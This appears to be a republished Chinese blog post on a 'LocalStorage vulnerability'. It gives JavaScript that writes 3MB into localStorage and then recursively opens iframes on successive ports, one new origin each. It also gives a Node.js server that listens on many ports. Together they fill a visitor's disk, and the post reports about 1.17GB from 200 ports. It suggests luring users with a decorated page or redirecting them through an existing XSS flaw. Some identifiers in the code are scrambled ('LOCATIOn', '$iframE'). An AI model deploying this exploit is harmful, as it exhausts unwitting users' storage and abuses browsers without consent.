大佬教程收集整理的这篇文章主要介绍了LocalStorage 的一个漏洞,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
LocalStorage 是 html5 的本地存储,其中的内容以文件的形式保存在本地磁盘中。
一个域(协议+域名+端口)的文件大小PC端为5~10M,移动端不大于2.5M。
但是我们可以在端口上做点手脚,因为端口是可控的,我们可以开一个服务器监听很多个端口,然后输出的页面使用iframe进行递归包含。
(function(){ var maxPort = ...; // 写文件 var s = ""; for(var i=0; i< 3 * 1024 * 1024; i++){ s += "0"; } localStorage.setItem('k',s); var port = parseInt(LOCATIOn.port) + 1; if(port > maxPort) return; if(port % 50 == 0){ //每50个重定向一次,防止崩溃 window.LOCATIOn.href = url; } else { // 新添加iframe var url = "http://example.com:" + port; var $iframe = document.createElement("iframe"); $iframe.src = url; document.getElementsByTagName("body")[0].appendChild($iframE); } })();
之后我们用Node.js架设服务器:
var http = require('http');
var fs = require('fs');
var content = fs.readFileSync('./index.html');
var maxPort = ...;
for(var port = 1000; port < maxPort; port++){
http.createServer(function (request,responsE) {
response.writeHead(200,{ 'Content-Type' : 'text/html; charset=UTF-8' });
response.write(content);
response.end();
}).listen(port);
}
我们可以给页面加点装饰,诱导用户点击。也可以使用现有的XSS漏洞重定向过去。
测试结果
100个端口有几乎500MB
200个端口则有1.17个G
如果将端口调整至2000个
GG。
注
以上是大佬教程为你收集整理的LocalStorage 的一个漏洞全部内容,希望文章能够帮你解决LocalStorage 的一个漏洞所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。